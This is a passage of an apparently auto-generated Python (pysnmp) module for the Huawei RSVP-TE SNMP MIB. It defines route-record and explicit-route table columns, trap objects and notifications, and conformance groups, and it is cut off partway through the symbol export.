hwRsvpTeRroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2), ("label", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroType.setStatus('current')
hwRsvpTeRroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpAddr.setStatus('current')
hwRsvpTeRroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroIpPrefixLen.setStatus('current')
hwRsvpTeRroLabel = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroLabel.setStatus('current')
hwRsvpTeRroFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeRroFlag.setStatus('current')
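# hwRsvpTeEroTable: Explicit Route Object (ERO) subobjects configured per
# sender.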
hwRsvpTeEroTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10), )
if mibBuilder.loadTexts: hwRsvpTeEroTable.setStatus('current')
hwRsvpTeEroEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeEroNumber"))
if mibBuilder.loadTexts: hwRsvpTeEroEntry.setStatus('current')
hwRsvpTeEroNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeEroNumber.setStatus('current')
hwRsvpTeEroType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("ipv4", 1), ("ipv6", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroType.setStatus('current')
hwRsvpTeEroIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpAddr.setStatus('current')
hwRsvpTeEroIpPrefixLen = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeEroIpPrefixLen.setStatus('current')
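# Notification branch: accessible-for-notify scalars bound into the
# NotificationType definitions that follow (hello loss/recovery,
# authentication results, neighbor-count thresholds).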
hwRsvpTeExtendObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 11))
hwRsvpTeExtendTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12))
hwRsvpTeTrapObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1))
hwRsvpTeNbr = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 1), IpAddress()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeNbr.setStatus('current')
hwRsvpTeIfNbrCurrentCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 2), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrCurrentCount.setStatus('current')
hwRsvpTeIfNbrThreshold = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 3), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrThreshold.setStatus('current')
hwRsvpTeIfNbrTotalCount = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 4), Integer32()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCount.setStatus('current')
hwRsvpTeIfName = MibScalar((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 1, 5), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: hwRsvpTeIfName.setStatus('current')
hwRsvpTeTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2))
hwRsvpTeHelloLost = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLost.setStatus('current')
hwRsvpTeHelloLostRecovery = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeHelloLostRecovery.setStatus('current')
hwRsvpTeAuthFail = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthFail.setStatus('current')
hwRsvpTeAuthSuccess = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"))
if mibBuilder.loadTexts: hwRsvpTeAuthSuccess.setStatus('current')
hwRsvpTeIfNbrThresholdExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceed.setStatus('current')
hwRsvpTeIfNbrThresholdExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrThresholdExceedClear.setStatus('current')
hwRsvpTeIfNbrTotalCountExceed = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceed.setStatus('current')
hwRsvpTeIfNbrTotalCountExceedClear = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 12, 2, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if mibBuilder.loadTexts: hwRsvpTeIfNbrTotalCountExceedClear.setStatus('current')
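# Conformance section: object/notification groups and the module compliance
# statement generated from the MIB's MODULE-COMPLIANCE clause.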
hwRsvpTeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2))
hwRsvpTeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1))
hwRsvpTeSessionGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionSenders"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionReceivers"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionRequests"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionTunnelExtId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionLspsNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionStyle"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeSessionGroup = hwRsvpTeSessionGroup.setStatus('current')
hwRsvpTeSenderGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 2)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDtot"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedCsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedDsum"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecGuaranteedMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadSvc"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadBreak"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadHopCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadPathBw"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMinLatency"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderAdspecCtrlLoadMtu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdSndNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderMsgIdRcvNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderClassType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestCtype"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestL3pid"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMinVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVpi"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestAtmMaxVci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMinDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderLabelRequestFrMaxDlci"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrName"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderSessionAttrIncludeAny"), ("HUAWEI-RSVPTE-MIB", 
"hwRsvpTeSenderSessionAttrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrSetupPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHoldPrio"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrHopLimit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrBandwidth"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrExcludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAny"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrIncludeAll"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderFrrInuseFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderDiffServPsc"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeSenderGroup = hwRsvpTeSenderGroup.setStatus('current')
hwRsvpTeResvGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 3)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvRsvpHop"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvConfirm"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeResvGroup = hwRsvpTeResvGroup.setStatus('current')
hwRsvpTeResvFwdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 4)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdDestAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdSenderAddrLength"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdHopLih"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterface"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdService"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecPeakRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecBurst"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMinTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTSpecMaxTu"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecRate"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRSpecSlack"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdScope"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdShared"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdExplicit"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdPolicy"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdFlag"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdEpoch"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdMsgIdNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdRsvpHop"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeResvFwdGroup = hwRsvpTeResvFwdGroup.setStatus('current')
hwRsvpTeIfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 5)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfIpNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrs"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshBlockadeMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshMultiple"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfTtl"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRouteDelay"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfUdpRequired"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfSrefreshInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranIncDelta"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfRetranInterval"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthEncrypted"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthHandshake"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthKey"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfWindowSize"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfAuthLifeTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeIfGroup = hwRsvpTeIfGroup.setStatus('current')
hwRsvpTeNbrGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 6)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloSrcInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloDstInstance"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloLostCounter"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrHelloEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrSendersNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReceiversNumber"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrCapability"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRestartTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrRecoveryTime"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGrStatus"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrAuthKeyId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReductionEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrReliabilityEnabled"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrProtocol"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeNbrGroup = hwRsvpTeNbrGroup.setStatus('current')
hwRsvpTeMessageIdGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 7)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeMessageIdGroup = hwRsvpTeMessageIdGroup.setStatus('current')
hwRsvpTeFilterSpecGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 8)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLspId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecIngressLsrId"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecLabel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeFilterSpecGroup = hwRsvpTeFilterSpecGroup.setStatus('current')
hwRsvpTeRroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 9)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpPrefixLen"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroLabel"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeRroGroup = hwRsvpTeRroGroup.setStatus('current')
hwRsvpTeEroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 10)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpPrefixLen"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeEroGroup = hwRsvpTeEroGroup.setStatus('current')
hwRsvpTeTrapObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 11)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeTrapObjectsGroup = hwRsvpTeTrapObjectsGroup.setStatus('current')
hwRsvpTeTrapGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 12)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLost"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLostRecovery"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthFail"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthSuccess"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceedClear"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceedClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeTrapGroup = hwRsvpTeTrapGroup.setStatus('current')
hwRsvpTeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2))
hwRsvpTeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapObjectsGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    hwRsvpTeCompliance = hwRsvpTeCompliance.setStatus('current')
mibBuilder.exportSymbols("HUAWEI-RSVPTE-MIB", hwRsvpTeIfIpNbrs=hwRsvpTeIfIpNbrs, hwRsvpTeResvFwdTSpecMaxTu=hwRsvpTeResvFwdTSpecMaxTu, hwRsvpTeSenderAdspecGuaranteedHopCount=hwRsvpTeSenderAdspecGuaranteedHopCount, hwRsvpTeMessageIdFlag=hwRsvpTeMessageIdFlag, hwRsvpTeResvFwdSenderAddr=hwRsvpTeResvFwdSenderAddr, hwRsvpTeCompliances=hwRsvpTeCompliances, hwRsvpTeIfRefreshInterval=hwRsvpTeIfRefreshInterval, hwRsvpTeIfGroup=hwRsvpTeIfGroup, hwRsvpTeSenderSessionAttrIncludeAny=hwRsvpTeSenderSessionAttrIncludeAny, hwRsvpTeResvFwdTable=hwRsvpTeResvFwdTable, hwRsvpTeGroups=hwRsvpTeGroups, hwRsvpTeRroIpPrefixLen=hwRsvpTeRroIpPrefixLen, hwRsvpTeResvFwdSenderAddrLength=hwRsvpTeResvFwdSenderAddrLength, hwRsvpTeEroTable=hwRsvpTeEroTable, 